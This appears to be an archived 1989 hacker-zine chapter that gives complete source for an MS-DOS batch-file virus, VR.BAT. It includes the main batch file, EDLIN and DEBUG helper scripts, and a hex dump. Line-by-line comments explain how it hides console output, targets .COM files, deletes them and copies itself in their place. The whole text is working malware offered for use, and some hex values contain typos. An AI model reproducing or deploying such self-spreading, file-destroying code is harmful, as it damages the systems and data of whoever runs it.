home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / CPI2.ZIP / CPI2-7.DOC < prev    next >
Encoding:
INI File  |  1989-07-26  |  2.7 KB  |  74 lines
  1. [2.7]
  2.  
  3.                             Batch Viruses
  4.                             -------------
  5.  
  6.  
  7. Whoever thought that viruses could be in BATCH file.This virus which we        
  8.  
  9. are about to see makes use of MS-DOS operating system. This BATCH virus
  10. uses DEBUG & EDLIN programs.
  11.  
  12. Name: VR.BAT
  13.  
  14. echo = off         ( Self explanatory)
  15. ctty nul           ( This is important. Console output is turned off)
  16. path c:\msdos      ( May differ on other systems )
  17. dir *.com/w>ind    ( The directory is written on "ind" ONLY name entries)      
  18.  
  19. edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
  20. debug ind<2        ( New batch program is created with debug)
  21. edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
  22. ctty con           ( Console interface is again assigned)
  23. name               ( Newly created NAME.BAT is called.
  24.  
  25.  
  26. In addition to file to this Batch file,there command files,here named 1,2,3
  27.  
  28. Here is the first command file:
  29. -------------------------------
  30. Name: 1
  31.  
  32. 1,4d               ( Here line 1-4 of the "IND" file are deleted )
  33. e                  ( Save file )
  34.  
  35. Here is the second command file:
  36. --------------------------------
  37. Name: 2
  38.  
  39. m100,10b,f000      (First program name is moved to the F000H address to save)  
  40.  
  41. e108 ".BAT"        (Extention of file name is changed to .BAT)
  42. m100,10b,f010      (File is saved again)
  43. e100"DEL "         (DEL command is written to address 100H)
  44. mf000,f00b,104     (Original file is written after this command)
  45. e10c 2e            (Period is placed in from of extension)
  46. e110 0d,0a         (Carrige return+ line feed)
  47. mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
  48. e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
  49. e12b od,0a         (COPY command terminated with carriage return + lf)
  50. rxc                ( The CX register is ... )
  51. 2c                 ( set to 2CH)
  52. nname.bat          ( Name it NAME.BAT)
  53. w                  ( Write )
  54. q                  ( quit )
  55.  
  56.  
  57. The third command file must be printed as a hex dump because it contains
  58. 2 control characters (1Ah=Control Z) and this is not entirely printable.
  59.  
  60. Hex dump of the third command file:
  61. -----------------------------------
  62. Name: 3
  63.  
  64. 0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 
  65.        1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
  66. 0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
  67.        y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
  68. 0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
  69.        y  y  y  y     .  E  .  .  .  .  .  .  .  .  .
  70.  
  71.  
  72. In order for this virus to work VR.BAT should be in the root. This program
  73. only affects .COM files.
  74.